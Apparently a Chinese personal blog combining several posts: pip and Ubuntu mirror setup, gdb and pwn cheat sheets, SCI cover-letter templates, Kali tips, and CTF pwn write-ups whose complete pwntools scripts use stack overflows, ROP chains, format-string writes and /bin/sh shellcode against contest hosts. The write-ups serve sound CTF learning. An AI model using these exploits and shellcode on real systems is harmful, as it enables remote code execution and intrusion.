python换源

临时使用:

pip install pythonModuleName -i http://pypi.douban.com --trusted-host=pypi.douban.com

永久使用:
修改配置文件:linux的文件在~/.pip/pip.conf,windows在%HOMEPATH%\pip\pip.ini),修改内容为:

[global]
index-url = http://pypi.douban.com/simple
trusted-host = pypi.douban.com

gdb调试汇总

  • break *0x400100(b main), 在0x400100处下断点,info b,查看断点信息,delete [number] ,删除断点
  • x /4xg $ebp, 查看ebp开始的4个8字节内容,(b表示单字节,h表示双字节,w表示四字节,g表示八字节;x表示十六进制输出,s表示字符串输出)
  • p $eax, 输出eax内容, set $eax = 4,修改变量值
  • c继续运行,r一直运行,
  • bt,查看函数调用
  • info f,查看当前栈帧,context查看运行上下文,context_stack查看当前堆栈
  • call func,强制函数调用
  • ropgagdet,找common rop
  • vmmap,查看虚拟地址分布
  • shellcode,搜索,生成shellcode

pwn相关汇总

  • 忽略某信号 trap "" signal , 例如 trap "" SIGALRM ,忽略时钟信号
  • python os.environ[‘LD_PRELOAD’] = './libc-x.so',指定libc加载
  • IDA pro: idapython findbinary(here(), SEARCH_DOWN, "61 62 63") 从当前位置开始搜索"abc"
  • libc可以用来leak heap地址,fastbins[10]或者normalbins
  • 获取eip控制权,可以直接到libc中寻找直接调用execve("/bin/sh")的地址(用ida加载libc.so,寻找引用 '/bin/sh' 的位置)
  • pwntools dynelf 获取两个函数地址相对偏移,获取偏移之后leak一次即可获得system地址
  • 程序运行之后找字符串,system("sh")通常也是可行的
  • stack overflow, frame faking,利用 leave, ret,fake ebp可以设置为某段可用的已知地址,比如选external之后的数据区,参考http://phrack.org/issues/58/4.html
< - stack grows this way
   addresses grow this way  - >
                        
                       saved FP   saved vuln. function's return address
--------------------------------------------
| buffer fill-up(*) | fake_ebp0 | leaveret | 
-------------------------|------------------
                         |
   +---------------------+         (*) this time, buffer fill-up must not
   |                                   overwrite the saved frame pointer !
   v
-----------------------------------------------
| fake_ebp1 | f1 | leaveret | f1_arg1 | f1_arg2 ...                     
-----|-----------------------------------------
     |                       the first frame
     +-+
       |
       v
     ------------------------------------------------
     | fake_ebp2 | f2 | leaveret | f2_arg1 | f2_argv2 ...
     -----|------------------------------------------
          |                  the second frame  
          +-- ...

  fake_ebp0 should be the address of the "first frame", fake_ebp1 - the
address of the second frame, etc.
  • 插入NULLbytes,http://phrack.org/issues/58/4.html 
  • gcc 编译shellcode :gcc -fno-stack-protector -z execstack -o bug bug.c
  • 64 bit call parameters RDI, RSI, RDX, R10, R8, R9

全国大学生信息安全竞赛writeup(PWN)

PWN1:(Careful)

明显的栈溢出,通过指定v3可以覆盖返回地址,想要构造shellcode太短了,只能写10个字节,注意到i也在栈上,所以可以重置计数器,

最后exp如下:

#!/usr/bin/env python
from pwn import *

DEBUG=0
if DEBUG:
    p = process("./bin/A44DD70F78267A1CCBEE12FE0D490AD6")
    context.log_level = 'debug'
else:
    p = remote("106.75.37.29", 10000)


def resetCounter():
    p.recvuntil("input index:")
    p.sendline("28")
    p.recvuntil("input value:")
    p.sendline(str(0x0))

def writeAddress(start, addr):
    data = hex(addr)[2:].rjust(8,'0')
    print data
    p.recvuntil("input index:")
    p.sendline(str(start))
    p.recvuntil("input value:")
    p.sendline(str(int(data[6:],16)))

    p.recvuntil("input index:")
    p.sendline(str(start+1))
    p.recvuntil("input value:")
    p.sendline(str(int(data[4:6],16)))

    p.recvuntil("input index:")
    p.sendline(str(start+2))
    p.recvuntil("input value:")
    p.sendline(str(int(data[2:4],16)))

    p.recvuntil("input index:")
    p.sendline(str(start+3))
    p.recvuntil("input value:")
    p.sendline(str(int(data[:2],16)))

def setCounter():
    p.recvuntil("input index:")
    p.sendline("28")
    p.recvuntil("input value:")
    p.sendline(str(0x10))


def exp():
    writeAddress(44, 0x08048420) #scanf
    writeAddress(48, 0x080486ae) #pop pop ret
    resetCounter()

    writeAddress(52, 0x080486ed) # %d
    writeAddress(56, 0x0804a200) # /bin
    resetCounter()

    writeAddress(60, 0x08048420) #scanf
    writeAddress(64, 0x080486ae) #pop pop ret
    resetCounter()

    writeAddress(68, 0x080486ed) #%d
    writeAddress(72, 0x0804a204) #/sh
    resetCounter()

    writeAddress(76, 0x080483e0) #plt@system
    writeAddress(84, 0x0804a200)

    raw_input("bp2")
    setCounter()

    p.sendline(str(u32('/bin')))
    p.sendline(str(u32('/sh\x00')))

    p.interactive()

exp()

PWN2:(Cis2)

还是栈溢出,注意到handle_op_code中没有对safe_stack 进行边界检查,可以溢出返回地址,将payload放到全局数组buffer里,跳转到buffer即可。

Exp如下:

#!/usr/bin/env python
from pwn import *

DEBUG=0
if DEBUG:
    p = process("./bin/0A77F6D4BD5CB2700A89F9C6F8D8F116")
else:
    p = remote("106.75.37.31", 23333)

def exp():
    p.recvuntil("Fight!\n")
    for i in range(30):
        p.sendline(str(0x602088))

    p.sendline('m')
    p.sendline('w')
    p.sendline('w')
    p.sendline('w')
    p.sendline('-')
    raw_input("bp")
    payload="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    p.sendline('q'+'a'*7+payload)

    p.interactive()


exp()

PWN3 mips

第一次接触mips架构的题目,汇编代码看了半天,有个点没get到,最后没有解出来,后来看了别人的wp之后,才发现真的就差一点,栈溢出是非常明显的

并且程序输入某个值可以打印处栈地址,而且没开nx,后面就直接覆盖返回地址为stack上放置payload的地址即可。

from pwn import *

#context.log_level = 'debug'
#context.update(arch='mips', endian='little')
p = remote("106.75.32.60", 10000)

p.recvuntil("help.\n")


p.sendline('2057561479')
p.recvuntil("0x")
stack_addr = int(p.recv(8), 16)

print "stack_addr =>", hex(stack_addr)
p.sendline('1'*0x70+p32(stack_addr+8))
p.recv()

payload = 'a'*8
payload += "\xff\xff\x10\x04"
payload += "\xab\x0f\x02\x24"
payload += "\x55\xf0\x46\x20"
payload += "\x66\x06\xff\x23"
payload += "\xc2\xf9\xec\x23"
payload += "\x66\x06\xbd\x23"
payload += "\x9a\xf9\xac\xaf"
payload += "\x9e\xf9\xa6\xaf"
payload += "\x9a\xf9\xbd\x23"
payload += "\x21\x20\x80\x01"
payload += "\x21\x28\xa0\x03"
payload += "\xcc\xcd\x44\x03"
payload += "/bin/sh"

p.sendline(payload)
p.recv()

p.sendline('exit')
p.interactive()

腾讯实习30强writeup(PWN)

1. PWN1 tc

Linux下的保护机制基本都没开,查看程序逻辑,发现我们输入的一个变量值v6会决定函数指针v7,其中 funcs是一个全局数组,并没有对v6值进行判断,因此我们可以通过设置v6的值让函数指向某个地址,观察全局变量区我们发现存在buf这个全局数组,而这个字符数组内容是在readIntergers函数中由用户输入的,因此我们可以控制buf的前四个字节为buf+4的地址,buf+4开始为linux shell的payload。

   

Exp如下:

#!/usr/bin/env python

from pwn import *



DEBUG = 0

buf_addr = 0x0804a0a0

#context.log_level = 'debug'

if DEBUG:

    p = process("./bin/tc1")

else:

    p = remote('106.75.9.11', 20000)



def exp():

    p.recvuntil("Divide\n")

    p.sendline("29")

    p.recvuntil("]\n")

    payload = p32(buf_addr+4)

    payload += "\x6a\x0b"

    payload += "\x58"

    payload += "\x31\xf6"

    payload += "\x56"

    payload += "\x68\x2f\x2f\x73\x68"

    payload += "\x68\x2f\x62\x69\x6e"

    payload += "\x89\xe3"

    payload += "\x31\xc9"

    payload += "\x89\xca"

    payload += "\xcd\x80"

    #raw_input("set bp")

    p.sendline(payload)

    p.interactive()


exp()

2. PWN2 echo-200

这个程序是一个静态链接的程序,checksec发现只开启了stack canary.

   

下面查看程序逻辑,逻辑比较简单,只是不断的读字符和打印字符 

 

注意到while循环里printf存在明显的格式化串漏洞,没开nx,我们就可以考虑直接将linux 获取shell的shellcode放在buffer里,利用思路如下:首先leak出buffer地址,根据size与buffer的相对偏移计算出size的地址,然后将size改为0x200,扩大buffer的size之后,下面就是劫持程序流程,我们可以计算出调用printf时返回地址与buffer的偏移,从而将返回地址修改为buffer中的某个地址,完整的利用exp如下:  

#!/usr/bin/env python
from pwn import *

DEBUG = 0
if DEBUG:
	p = process('./bin/echo-200')
else:
	p = remote('106.75.9.11', 20001)

context.log_level = 'debug'
def exp():
    p.recvuntil("\n")
    p.sendline("%5$x")
    buf_addr = u32(p.recvuntil('\n')[:-1].decode('hex')[::-1])
    print "buf_addr =>", hex(buf_addr)
    p.recvuntil("\n")
    payload = p32(buf_addr-0xc)
    payload += "%"+str(0x200-4)+"c"
    payload += "%7$hn"
    p.sendline(payload)
    p.recvuntil('\n')
    ret_addr = buf_addr - 0x20
    payload_addr = buf_addr + 0x100
    print "payload_addr =>", hex(payload_addr)
    payload_low_addr= payload_addr & 0xffff
    payload_high_addr = payload_addr >> 16
    if payload_high_addr > payload_low_addr:
	payload2 = p32(ret_addr)
	payload2 += p32(ret_addr+2)
	payload2 += '%'+str(payload_low_addr - 8)+'c'
	payload2 += "%7$hn"
	payload2 += '%'+str(payload_high_addr - payload_low_addr)+'c'
	payload2 += "%8$hn"
	payload2 += 'a'*(0x100- len(payload2))
	payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
    else:
	payload2 = p32(ret_addr+2)
	payload2 += p32(ret_addr)
	payload2 += '%'+str(payload_high_addr - 8)+'c'
	payload2 += "%7$hn"
	payload2 += '%'+str(payload_low_addr - payload_high_addr)+'c'
	payload2 += "%8$hn"
	payload2 += 'a'*(0x100- len(payload2))
	payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

    p.sendline(payload2)
    p.interactive()

exp()

 

3. PWN3 qwb3

这个程序开启了NX,查看程序逻辑,发现vulnerable_function函数存在明显的栈溢出,主要在于怎么利用

   

开始的思路是构造rop去leak write函数和read函数的地址,然后利用libc-database去找对应的libc,后来leak出来之后发现没有对应的libc版本,接下来想到直接用pwntools的dynelf去爆破system函数地址,与leak出来的write函数地址计算偏移。下次攻击时只需要leak处write函数便可计算出system函数地址,最后就是构造rop去写/bin/sh,并传给system函数,此处可以参考http://drops.wooyun.org/papers/7551,里面介绍了一段x64下一段比较通用的gadget,exp如下:

#!/usr/bin/env python
from pwn import *

DEBUG = 0
main = 0x40049d
binsh_addr = 0x601300

if DEBUG:
    p = process("./bin/qwb3")
    offset = 0x9c6d0
else:
    p = remote("106.75.8.230", 19286)
    offset = 0x9cc20

def leak(addr):
    payload = 'a'*72
    payload += p64(0x400631) # pop rsi, pop r15, ret
    payload += p64(addr) 
    payload += 'b'*8
    payload += p64(0x4005b6) 
    p.sendline(payload)
    data = p.recv(8)
    log.debug("%#x => %s" %(addr, (data or '').encode('hex')))
    p.recv()
    return data

def exp():
    '''
    p.recvuntil("\n")
    d = DynELF(leak, main, elf=ELF('./bin/qwb3'))
    system_addr = d.lookup('system', 'libc')
    write_addr = d.lookup('write', 'libc')
    print "system_addr =>", hex(system_addr)
    print "offset =>", hex(write_addr - system_addr)
    p.interactive()
    '''
    p.recvuntil("\n")
    payload = 'a'*72
    payload += p64(0x400631) # pop rsi, pop r15, ret
    payload += p64(0x601018) #got_write
    payload += p64(0)
    payload += p64(0x400633) # pop rdi, ret
    payload += p64(1) 
    payload += p64(0x400450) # plt_write
    payload += p64(0x400631) # pop rsi, pop r15, ret
    payload += p64(binsh_addr) # buf
    payload += p64(0) #rbp
    payload += p64(0x400633) # pop rdi, ret
    payload += p64(0)
    payload += p64(0x400460) # r12 read@got
    payload += p64(0x40059d) # vuln_function
    #raw_input("bp")
    p.sendline(payload)
    write_addr = u64(p.recv(8))
    system_addr = write_addr - offset
    print "system_addr =>", hex(system_addr)
    #raw_input("bp2")
    p.sendline('/bin/sh'+'\x00')
    payload2 = 'a'*72
    payload2 += p64(0x400633)  #pop rdi, ret
    payload2 += p64(binsh_addr)  #
    payload2 += p64(system_addr)
    p.sendline(payload2)
    p.recv()
    p.interactive()

exp()

4. PWN4

主程序逻辑如下:

 

其中,welcome函数和inputName函数分别是打印信息和输入用户名,checkFlag函数大概逻辑是要求你输入flag,并根据你输入的flag的长度与远程的flag相应前几个对应字符进行对比,匹配与不匹配时输出的信息不一样,这里就存在爆破的可能,首先爆破第一个字符,成功后继续爆破第二个,依次破解单个字符

 

Exp如下:

#!/usr/bin/env python
from pwn import *
import string
import time

whole_flag = ""
isCorrect = False

def exp(flag):
    global whole_flag
    global isCorrect
    p = remote('106.75.8.230', 13349)
    p.recvuntil("YOUR NAME:")
    p.sendline('aaa')
    p.recvuntil("again?\n")
    p.sendline('aaa')
    p.recvuntil("FLAG: ")
    p.sendline(flag)
    result = p.recv()
    if result.find("submit")>=0:
        whole_flag = flag
        isCorrect = True
        print "current flag:", flag,
    p.close()

#exp(whole_flag)
while len(whole_flag) < 20:
    isCorrect = False
    for i in string.ascii_letters+string.digits+'{_}':
        exp(whole_flag+i)
        time.sleep(0.5)
        if isCorrect == True:
            break
    if not isCorrect:
        print whole_flag
        break

print "whole flag:", whole_flag

qlcoder跬步

  1. SQL盲注
  2. 树状数组/线段树
  3. Chrome控制台调试js
  4. python库
    • networkx 图论库(最短路径、连通子集)
    • bs4(html解析)
    • requests(爬虫)
    • bitstream(二进制流读写)
    • pp(程序并行,多cpu利用)
  5. awk(官方手册:http://www.gnu.org/software/gawk/manual/gawk.html)和 sed
  6. flash逆向工程
  7. webarchive
  8. RSA破解:
    • 大整数分解(yafu或者msieve)以及RSATool
    • 求乘法逆元(python的gmpy2库)
    • powmod(python内置函数pow(c,d,n))
  9. 数学求解——wolframalpha
  10. HTTP协议,断点续传相关,请求:Range:bytes=1111-1112 响应:Content-Range: bytes

Continue reading qlcoder跬步

SCI 投稿全过程信件模板一览

SCI 投稿全过程信件模板一览:

一、最初投稿Cover letter

Dear Editors:

We would like to submit the enclosed manuscript entitled “Paper Title”, which we wish to be considered for publication in “Journal Name”. No conflict of interest exits in the submission of this manuscript, and manuscript is approved by all authors for publication. I would like to declare on behalf of my co-authors that the work described was original research that has not been published previously, and not under consideration for publication elsewhere, in whole or in part. All the authors listed have approved the manuscript that is enclosed.

In this work, we evaluated …… (简要介绍一下论文的创新性). I hope this paper is suitable for “Journal Name”. The following is a list of possible reviewers for your consideration:

1) Name A   E-mail: ××××@××××
2) Name B   E-mail: ××××@××××

We deeply appreciate your consideration of our manuscript, and we look forward to receiving comments from the reviewers. If you have any queries, please don’t hesitate to contact me at the address below.

Thank you and best regards.

Yours sincerely,
××××××
Corresponding author: 
Name: ×××
E-mail: ××××@××××

二、催稿信

Dear Prof. ×××:

Sorry for disturbing you. I am not sure if it is the right time to contact you to inquire about the status of my submitted manuscript titled “Paper Title”. (ID: 文章稿号), although the status of “With Editor” has been lasting for more than two months, since submitted to journal three months ago. I am just wondering that my manuscript has been sent to reviewers or not?

I would be greatly appreciated if you could spend some of your time check the status for us. I am very pleased to hear from you on the reviewer’s comments. Thank you very much for your consideration.

Best regards! 
Yours sincerely,
××××××
Corresponding author: 
Name: ×××
E-mail: ××××@××××

三、修改稿Cover letter

Dear Dr/ Prof..(写上负责你文章编辑的姓名,显得尊重,因为第一次的投稿不知道具体负责的编辑,只能用通用的Editors):

On behalf of my co-authors, we thank you very much for giving us an opportunity to revise our manuscript, we appreciate editor and reviewers very much for their positive and constructive comments and suggestions on our manuscript entitled “Paper Title”. (ID: 文章稿号).

We have studied reviewer’s comments carefully and have made revision which marked in red in the paper. We have tried our best to revise our manuscript according to the comments. Attached please find the revised version, which we would like to submit for your kind consideration.

We would like to express our great appreciation to you and reviewers for comments on our paper. Looking forward to hearing from you. Thank you and best regards.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

四、修改稿回答审稿人的意见(最重要的部分)

List of Responses

Dear Editors and Reviewers:

Thank you for your letter and for the reviewers’ comments concerning our manuscript entitled “Paper Title” (ID: 文章稿号). Those comments are all valuable and very helpful for revising and improving our paper, as well as the important guiding significance to our researches. We have studied comments carefully and have made correction which we hope meet with approval. Revised portion are marked in red in the paper. The main corrections in the paper and the responds to the reviewer’s comments are as flowing:

Responds to the reviewer’s comments:

Reviewer #1:

1. Response to comment: (……简要列出意见……)

Response: ××××××

2. Response to comment: (……简要列出意见……)

Response: ×××××× 。。。。。。

逐条意见回答,切忌一定不能有遗漏

针对不同的问题有下列几个礼貌术语可适当用用:

  • We are very sorry for our negligence of ………
  • We are very sorry for our incorrect writing ………
  • It is really true as Reviewer suggested that……
  • We have made correction according to the Reviewer’s comments.
  • We have re-written this part according to the Reviewer’s suggestion
  • As Reviewer suggested that……
  • Considering the Reviewer’s suggestion, we have ……

最后特意感谢一下这个审稿人的意见:

Special thanks to you for your good comments.

Reviewer #2:

同上述

Reviewer #3:

××××××

Other changes:

  1. Line 60-61, the statements of “……” were corrected as “…………”
  2. Line 107, “……” was added
  3. Line 129, “……” was deleted ××××××We tried our best to improve the manuscript and made some changes in the manuscript. These changes will not influence the content and framework of the paper. And here we did not list the changes but marked in red in revised paper. We appreciate for Editors/Reviewers’ warm work earnestly, and hope that the correction will meet with approval.

Once again, thank you very much for your comments and suggestions.

五、文章接受后可以考虑感谢一下负责你文章的编辑或主编(根据需要)

Dear Prof. ××××××:

Thanks very much for your kind work and consideration on publication of our paper. On behalf of my co-authors, we would like to express our great appreciation to editor and reviewers. Thank you and best regards.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

六、询问校稿信件(如果文章接受后时间较长)

Dear ×××:

Sorry for disturbing you. I am not sure if it is the right time to contact you to inquire about the status of our accepted manuscript titled “Paper Title” (ID: 文章稿号), since the copyright agreement for publication has been sent to you two months ago. I am just wondering that how long I can receive the proof of our manuscript from you? I would be greatly appreciated if you could spend some of your time for a reply. I am very pleased to hear from you.

Thank you very much for your consideration.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

七、文章校稿信件

Dear Mr. ×××:

Thanks very much for your kind letter about the proof of our paper titled “Paper Title” (ID: 文章稿号) for publication in “Journal Name”. We have finished the proof reading and checking carefully, and some corrections about the proof and the answers to the queries are provided below.

Corrections:

  1. In should be (Page , Right column, line**)
  2. In the “” should be “” (Page , Right column, line*) Answers for “author queries”:
  3. *********************.


We greatly appreciate the efficient, professional and rapid processing of our paper by your team. If there is anything else we should do, please do not hesitate to let us know.

Thank you and best regards.

Yours sincerely,
××××××
Corresponding author:
Name: ×××
E-mail: ××××@××××

转自: SecDr

ubuntu12.04/14.04配置

安装阿里源

14.04源

deb http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-proposed main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ trusty-backports main restricted universe multiverse

12.04的源只需要将里面的trusty换成precise即可。
将给内容覆盖/etc/apt/sources.list内容即可。(最好先备份一下)

安装pycharm、shadowsocks

sudo add-apt-repository ppa:mystic-mirage/pycharm  # 添加 pycharm ppa源
 
sudo add-apt-repository ppa:hzwhuang/ss-qt5 # 添加 ss-qt5 ppa源(14.04及以上支持)
 
sudo apt-get update
 
sudo apt-get install pycharm/pycharm-community

添加之后如果遇到ppa源无法连接到的问题,可以通过Ubuntu自带的update-manager工具查看是否ppa源添加过多或者存在其他问题。

安装open-in-terminal

sudo apt-get install nautilus-open-terminal

安装中文输入

进入【settings】-> 【Lanuage Support】,点击 Install/Remove Languages,选择Chinese(simplified),点击 Apply Changes开始安装中文支持,安装成功后,在终端输入 ibus-setup,进行输入法配置,进入 Input Method标签页,添加 Chinese-Pinyin输入法即可。

附:

Ubuntu虚拟机安装之后登陆黑屏的解决方法:设置Ubuntu虚拟机的显示器,取消【加速3D图形】选项

kali linux 2.0 安装后的10点配置建议

自Kali 2.0发布以来,我们发现在安装kali之后经常会重复一些配置操作,对此,我们想要把它们分享出来,希望对大家也能够有所帮助。我们整理了一些遇到的常见问题的回答。下面是其中最常见的10个:

  • 激活或禁用智能侧边栏

有的人喜欢它,有的人不喜欢它。我们谈一下如何改变侧边栏的行为。进入【优化工具】,选择【扩展】,可以看到【Dash to dock】处于开启的状态,点击右侧的设置按钮,在【Position and size】tab页可以看到【Intelligent autohide】,只要将该选项禁用即可改变侧边栏的智能隐藏行为,附视频链接:Disabling the Kali Linux 2.0 Sidebar Autohide feature from Offensive Security on Vimeo.

  • 将你的SSH公钥添加到Kali 2.0

Kali Linux 2.0 延续了Debian的SSH配置选项, 从Jessie版本之后默认不允许root用户在没有key的情况下登录。

root@kali:~# grep Root /etc/ssh/sshd_config
PermitRootLogin without-password

比较不提倡的一种方法是将PermitRootLogin参数设置为“yes”然后重启SSH服务,可以允许root用户远程登录。如果要实现更加安全的远程root访问,可以将你的公钥添加到/root/.ssh/authorized_keys 文件中。

  • 需要时安装NVIDIA驱动

如果你有一块NVIDIA显卡,你应该按照这些步骤来为Kali 2.0安装NVIDIA驱动。

  • 需要时安装VMware或者VirualBox Guest Tools

安装虚拟机客户工具的方法并没有很大变化,在最新的Vmware(Workstation和Fusion)以及VirtualBox中都能够正常工作。

  • 禁用Gnome桌面的锁屏特性

我们没有在正式版中禁用这个特性但是会在接下来的开发中以及将来的ISO发行版中这样做。下面是禁用Gnome锁屏特性的最快方法:进入【设置】-》【电源】,将【省电】中的空白屏幕设置为【从不】(never),然后回到【设置】主界面,进入【隐私】,将【锁屏】设为关。 附视频链接:Disable the Screen Lock Gnome feature in Kali 2.0  from Offensive Security on Vimeo.

  • 不要在你安装的kali 2.0中添加额外的源

如果因为某些原因,你在安装kali过程中,当被问到“使用网络镜像”时选择了否,可能会导致你的sources.list文件中丢失一些条目。如果是这种情况,检查一下官方的源列表来确定哪些条目应该在那个文件中。即使很多非官方的说明让你这样做,你也应该避免在sources.list文件中添加多余的源。不要添加kali-dev, kali-rolling 或者任何其他的kali源除非你有特别的理由,一般情况下你是没有的。如果你不得不添加额外的源,在/etc/apt/sources.list.d/目录下添加一个新的源文件。

  • 如果以root用户运行让你觉得不爽,添加一个非root用户

我们看到很多用户使用Kali非常谨慎因为主要的系统用户是root。这经常会令我们感到困惑,因为添加一个非root用户到Kali中是一件微不足道的事情并且通过几条类似下面的简单命令很容易就能够做到这一点:

root@kali:~# useradd -m muts -G sudo -s /bin/bash
root@kali:~# passwd muts
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:~#

  • 避免安装Flash Player

只要记住不要这样做。

  • 保持kali系统更新

我们每天4次同步来自debian的更新。这使得Kali的安全更新一直保持最新状态。你应该通过经常执行下面的命令来保持你的系统处在最新状态:

apt-get update
apt-get dist-upgrade

  • 避免在FSH定义的目录中手动安装工具

你有几种不同的方式来使用Kali——或者作为一个用后可仍的渗透系统或者作为一个长期使用的系统。用后可仍的方式是指安装kali作为一次性或者短期用途之后就扔掉。长期使用则是指想要每天使用Kali。这两种方式都是有效的但是需要区别对待。如果你计划每天使用Kali, 你应该避免在FSH定义的目录中手动安装程序因为这可能会与现有的包管理工具冲突。

参考:Kali Linux 2.0 Top 10 Post Install Tips